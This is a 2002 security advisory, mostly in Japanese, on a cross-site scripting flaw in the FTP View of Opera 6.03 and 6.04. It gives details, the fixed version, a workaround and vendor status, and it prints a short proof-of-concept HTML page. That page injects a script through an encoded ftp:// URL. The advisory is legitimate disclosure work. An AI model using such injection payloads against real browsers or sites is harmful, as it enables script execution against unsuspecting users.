Opera FTP View Cross-Site Scripting Vulnerability

Title:	Opera FTP View Cross-Site Scripting Vulnerability
Date:	4 August 2002 (Last modified: )
Author:	Eiji James Yoshida [ptrs-ejy@bp.iij4u.or.jp] penetration technique research site [Advisories]
Risk:	Medium
Vulnerable:	Windows2000 SP2 Opera 6.03 Windows2000 SP2 Opera 6.04
Not vulnerable:	Opera 6.05
Bugtraq ID:	5401
Overview:	OperaブラウザのFTP View機能にはクロスサイト・スクリプティング脆弱性があります。
Details:	この脆弱性はOperaブラウザのFTP View機能に原因があります。 FTP View画面のタイトル部分である'<title>URL</title>'に表示するURLをサニタイジングしていないことが原因です。
Exploit code:	<html> <head> <META http-equiv="Refresh" content="5 ; url=ftp://%3c%2ftitle%3e%3cscript%3ealert(%22exploit%22)%3b%3c%2fscript%3e@[FTPserver]/"> </head> <body> <script>window.open("ftp://[FTPserver]/");</script> </body> </html>
Demonstration:	screen shot
Workaround:	JavaScriptを無効に設定してください。
Vendor status:	Opera Software ASAには2002年6月30日に報告しました。
Similar vulnerabilities:	インターネットエクスプローラの「FTPサイト用フォルダビュー」がスクリプトを実行する脆弱性
Similar vulnerabilities:	Mozilla FTP View Cross-Site Scripting Vulnerability